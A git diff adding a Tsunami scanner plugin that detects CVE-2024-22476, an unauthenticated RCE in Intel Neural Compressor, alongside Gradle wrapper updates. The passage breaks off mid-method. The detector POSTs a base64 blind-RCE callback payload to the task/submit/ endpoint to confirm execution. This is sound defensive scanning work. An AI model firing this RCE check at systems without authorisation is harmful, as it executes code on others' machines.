ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/influxdb_cve_2019_20933/gradlew.bat b/community/detectors/influxdb_cve_2019_20933/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/influxdb_cve_2019_20933/gradlew.bat +++ b/community/detectors/influxdb_cve_2019_20933/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/README.md b/community/detectors/intel_neural_compressor_cve_2024_22476/README.md new file mode 100644 index 000000000..154f94d80 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/README.md @@ -0,0 +1,20 @@ +# Intel(R) Neural Compressor CVE-2024-22476 Detector + +This detector checks for Intel(R) Neural Compressor CVE-2024-22476 +Unauthenticated Remote Code Execution (CVE-2024-22476). Improper input +validation in some Intel(R) Neural Compressor software before version 2.5.0 may +allow an unauthenticated user to potentially enable escalation of privilege via +remote access. + +- https://huntr.com/bounties/877a517f-76ec-45be-8d3b-2b5ac471bfeb +- https://vulners.com/cvelist/CVELIST:CVE-2024-22476 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/build.gradle b/community/detectors/intel_neural_compressor_cve_2024_22476/build.gradle new file mode 100644 index 000000000..d5b080086 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/build.gradle @@ -0,0 +1,68 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami CVE-2024-22476 VulnDetector plugin.' +group 'com.google.tsunami' +version '0.0.1-SNAPSHOT' + + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + okhttpVersion = '3.12.0' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} \ No newline at end of file diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.jar b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..e6441136f Binary files /dev/null and b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.properties b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew new file mode 100755 index 000000000..b740cf133 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew.bat b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/settings.gradle b/community/detectors/intel_neural_compressor_cve_2024_22476/settings.gradle new file mode 100644 index 000000000..6e7a65fa8 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/settings.gradle @@ -0,0 +1,10 @@ +/* + * This file was generated by the Gradle 'init' task. + * + * The settings file is used to specify which projects to include in your build. + * + * Detailed information about configuring a multi-project build in Gradle can be found + * in the user manual at https://docs.gradle.org/6.5/userguide/multi_project_builds.html + */ + +rootProject.name = 'CVE-2024-22476' diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476DetectorBootstrapModule.java b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476DetectorBootstrapModule.java new file mode 100644 index 000000000..ead69a8ed --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476DetectorBootstrapModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.cves.cve202422476; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** An CVE-2024-22476 Guice module that bootstraps the {@link Cve202422476VulnDetector}. */ +public class Cve202422476DetectorBootstrapModule extends PluginBootstrapModule { + @Override + protected void configurePlugin() { + registerPlugin(Cve202422476VulnDetector.class); + } +} diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetector.java b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetector.java new file mode 100644 index 000000000..19a703209 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetector.java @@ -0,0 +1,220 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.cves.cve202422476; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority; +import static com.google.tsunami.common.net.http.HttpRequest.post; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.io.BaseEncoding; +import com.google.common.io.Resources; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects the CVE-2024-22476 vulnerability. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2024-22476 Detector", + version = "0.1", + description = "Checks for occurrences of CVE-2024-22476 in Intel Neural Compressor instances.", + author = "frkngksl", + bootstrapModule = Cve202422476DetectorBootstrapModule.class) +@ForWebService +public final class Cve202422476VulnDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final Clock utcClock; + private final PayloadGenerator payloadGenerator; + + private static final String VUL_PATH = "task/submit/"; + private static final Duration BATCH_REQUEST_WAIT_AFTER_TIMEOUT = Duration.ofSeconds(10); + private final String taskRequestTemplate; + private final HttpClient httpClient; + + @Inject + Cve202422476VulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) + throws IOException { + this.utcClock = checkNotNull(utcClock); + this.httpClient = + checkNotNull(httpClient, "HttpClient cannot be null.") + .modify() + .setFollowRedirects(false) + .build(); + this.payloadGenerator = checkNotNull(payloadGenerator, "PayloadGenerator cannot be null."); + taskRequestTemplate = + Resources.toString(Resources.getResource(this.getClass(), "task_request.json"), UTF_8); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isWebServiceOrUnknownService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean checkNeuralSolutionFingerprint(NetworkService networkService) { + String targetWebAddress = buildTarget(networkService).toString(); + var request = HttpRequest.get(targetWebAddress).withEmptyHeaders().build(); + + try { + HttpResponse response = httpClient.send(request, networkService); + return response.status().isSuccess() + && response + .bodyString() + .map(body -> body.contains("{\"message\":\"Welcome to Neural Solution!\"}")) + .orElse(false); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private boolean isWebServiceOrUnknownService(NetworkService networkService) { + return NetworkServiceUtils.isWebService(networkService) + && checkNeuralSolutionFingerprint(networkService); + } + + private static StringBuilder buildTarget(NetworkService networkService) { + StringBuilder targetUrlBuilder = new StringBuilder(); + if (NetworkServiceUtils.isWebService(networkService)) { + targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService)); + } else { + targetUrlBuilder + .append("https://") + .append(toUriAuthority(networkService.getNetworkEndpoint())) + .append("/"); + } + return targetUrlBuilder; + } + + private boolean isServiceVulnerable(NetworkService networkService) { + Payload payload = generateCallbackServerPayload(); + if (!payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atInfo().log( + "The Tsunami callback server is not setup for this environment, so we cannot confirm the" + + " RCE callback"); + return false; + } + String taskRequestBody = taskRequestTemplate; + // Check callback server is enabled + logger.atInfo().log("Callback server is available!"); + taskRequestBody = + taskRequestBody.replace( + "{{CALLBACK_PAYLOAD}}", + BaseEncoding.base64().encode(payload.getPayload().getBytes(UTF_8))); + String targetVulnerabilityUrl = buildTarget(networkService).append(VUL_PATH).toString(); + logger.atInfo().log("Payload: %s", payload.getPayload().getBytes(UTF_8)); + try { + HttpResponse httpResponse = + httpClient.send( + post(targetVulnerabilityUrl) + .setHeaders( + HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8(taskRequestBody)) + .build(), + networkService); + logger.atInfo().log("Callback Server Payload Response: %s", httpResponse.bodyString().get()); + Uninterruptibles.sleepUninterruptibly(BATCH_REQUEST_WAIT_AFTER_TIMEOUT); + return payload.checkIfExecuted(); + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private Payload generateCallbackServerPayload() { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + 